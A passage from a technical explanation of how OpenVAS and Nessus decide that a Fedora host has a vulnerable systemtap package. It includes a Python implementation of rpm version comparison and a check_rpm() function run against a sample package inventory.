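The check sits where the operands are already on the stack, before any code is emitted or executed; rejecting the whole expression is the right outcome because debuginfo that fails to parse cannot be trusted for any of the probe's other locations either.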
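Both the OpenVAS plugins (isrpmvuln) and the Nessus plugins (rpm_check) above decide "vulnerable" the same way: the host's package list is searched for the advisory's package and its installed epoch/version/release is compared against the fixed one, systemtap-1.4-6.fc13 or systemtap-1.4-6.fc14. The following is an added example, not OpenVAS's pkg-lib-rpm.inc nor Nessus's rpm.inc: an implementation of rpm's rpmvercmp() segment rules, an EVR comparison on top of it, and a check_rpm() that returns the same three outcomes the plugins report (older than the fix, fixed, not installed). One caveat worth knowing when reading the OpenVAS source: the `~` in `rpm:"systemtap~1.4~6.fc14"` is OpenVAS's own field separator for name, version and release, unrelated to the `~` that rpm itself treats as a pre-release marker in version sorting. The INVENTORY list is a constructed rpm -qa style package list.

```python
"""RPM EVR comparison as done by package-based local checks.
Constructed example; not OpenVAS's pkg-lib-rpm.inc nor Nessus's rpm.inc."""
import re

# A version string is compared segment by segment: runs of digits, runs of
# letters, and the special '~' and '^' markers. Separators like '.', '-', '_'
# are skipped, which is why findall() is enough to tokenise.
_SEGMENT = re.compile(r"[0-9]+|[A-Za-z]+|~|\^")


def rpmvercmp(a: str, b: str) -> int:
    """Return -1, 0 or 1 following the rules of rpm's rpmvercmp()."""
    if a == b:
        return 0
    sa, sb = _SEGMENT.findall(a), _SEGMENT.findall(b)
    i = 0
    while True:
        ta = sa[i] if i < len(sa) else None
        tb = sb[i] if i < len(sb) else None
        if ta is None and tb is None:
            return 0
        # '~' sorts before everything, including end of string: 1.0~rc1 < 1.0
        if ta == "~" or tb == "~":
            if ta != "~":
                return 1
            if tb != "~":
                return -1
            i += 1
            continue
        # '^' sorts after end of string but before any other segment:
        # 1.0^post > 1.0 and 1.0^post < 1.0.1
        if ta == "^" or tb == "^":
            if ta is None:
                return -1
            if tb is None:
                return 1
            if ta != "^":
                return 1
            if tb != "^":
                return -1
            i += 1
            continue
        if ta is None:
            return -1
        if tb is None:
            return 1
        if ta.isdigit() and tb.isdigit():
            if int(ta) != int(tb):
                return -1 if int(ta) < int(tb) else 1
        elif ta.isdigit():
            return 1          # a numeric segment is newer than an alphabetic one
        elif tb.isdigit():
            return -1
        elif ta != tb:
            return -1 if ta < tb else 1
        i += 1


def split_nevr(pkg: str):
    """'systemtap-1.4-6.fc14' -> ('systemtap', '0', '1.4', '6.fc14').
    An 'epoch:' prefix on the version field is honoured; default epoch is 0."""
    name, version, release = pkg.rsplit("-", 2)
    epoch = "0"
    if ":" in version:
        epoch, version = version.split(":", 1)
    return name, epoch, version, release


def evr_cmp(installed: str, reference: str) -> int:
    """Compare two NEVR strings of one package: epoch, then version, then release."""
    n1, e1, v1, r1 = split_nevr(installed)
    n2, e2, v2, r2 = split_nevr(reference)
    if n1 != n2:
        raise ValueError(f"different packages: {n1} vs {n2}")
    for x, y in ((e1, e2), (v1, v2), (r1, r2)):
        c = rpmvercmp(x, y)
        if c:
            return c
    return 0


def check_rpm(installed_rpms, reference: str):
    """Mimic rpm_check()/isrpmvuln(): True if the package named in `reference`
    is installed at an older EVR, False if at or above the fix, None if absent."""
    name = split_nevr(reference)[0]
    for rpm in installed_rpms:
        if split_nevr(rpm)[0] == name:
            return evr_cmp(rpm, reference) < 0
    return None


# Constructed rpm -qa style inventory for a Fedora 14 host.
INVENTORY = [
    "kernel-2.6.35.6-45.fc14",
    "systemtap-1.4-5.fc14",
    "systemtap-runtime-1.4-5.fc14",
]

if __name__ == "__main__":
    print(check_rpm(INVENTORY, "systemtap-1.4-6.fc14"))
```

The release tag matters as much as the version: the plugins gate on FC13 or FC14 before comparing, because 6.fc13 and 6.fc14 are different builds and a Fedora 13 reference applied to a Fedora 14 host would produce a false result. check_rpm() inherits that gating from the caller choosing the right reference string.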